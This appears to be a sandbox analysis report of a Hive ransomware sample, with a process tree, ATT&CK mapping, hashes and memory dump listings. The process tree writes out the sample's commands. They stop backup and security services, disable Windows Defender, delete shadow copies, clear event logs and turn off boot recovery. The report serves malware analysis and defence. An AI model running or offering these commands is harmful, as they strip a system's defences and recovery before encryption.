The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
"C:\Users\Admin\AppData\Local\Temp\2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\system32\net.exe
  net.exe stop "NetMsmqActivator" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NetMsmqActivator" /y
    3⤵
    PID:2308
- C:\Windows\system32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:2764
- C:\Windows\system32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:2796
- C:\Windows\system32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:3036
- C:\Windows\system32\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:2868
- C:\Windows\system32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:2704
- C:\Windows\system32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:2620
- C:\Windows\system32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:2580
- C:\Windows\system32\sc.exe
  sc.exe config "NetMsmqActivator" start= disabled
  2⤵
  - Launches sc.exe
  PID:2608
- C:\Windows\system32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:2688
- C:\Windows\system32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:1168
- C:\Windows\system32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:1960
- C:\Windows\system32\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  - Launches sc.exe
  PID:1080
- C:\Windows\system32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:668
- C:\Windows\system32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:436
- C:\Windows\system32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:568
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:924
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:2920
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:2996
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:3016
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:1888
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2140
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2032
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:368
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1580
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1752
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:2844
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:2016
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:2840
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:2020
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2908
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2916
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:1076
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:1968
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:1584
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1760
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:1892
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:2104
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:3068
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:2492
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1280
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1416
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:2176
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1864
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:628
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2664
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2248
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:1044
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1904
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1384
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1200
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1648
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2220
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2744
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:1344
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:2520
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2392
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:1656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
dd89da51b615a57ecda18cbb08dbce63

SHA1
494082750f438ee6bda5bd55f9e9cfb4a780c6fe

SHA256
e194ea2cce98c5a4cb6c21376b7faf3a6e15e6b95e158b57a51c27fd55238e3d

SHA512
d41fd9da341b8298d641c9b7655aee2bb519d3701c30713d7c56422ed6ef530615a6ad6e0bcb378b1a3a9e137692d453b2b0e541078948919532bc8d0a6d8401

Download Submit
memory/2392-15-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2392-7-0x000000001B170000-0x000000001B452000-memory.dmp

Filesize
2.9MB

Download
memory/2392-10-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2392-11-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2392-12-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2392-13-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2392-9-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/2392-14-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2392-8-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2876-21-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

Filesize
2.9MB

Download
memory/2876-23-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download
memory/2876-24-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2876-22-0x000007FEF4B10000-0x000007FEF54AD000-memory.dmp

Filesize
9.6MB

Download
memory/2876-25-0x000007FEF4B10000-0x000007FEF54AD000-memory.dmp

Filesize
9.6MB

Download
memory/2876-26-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2876-27-0x000007FEF4B10000-0x000007FEF54AD000-memory.dmp

Filesize
9.6MB

Download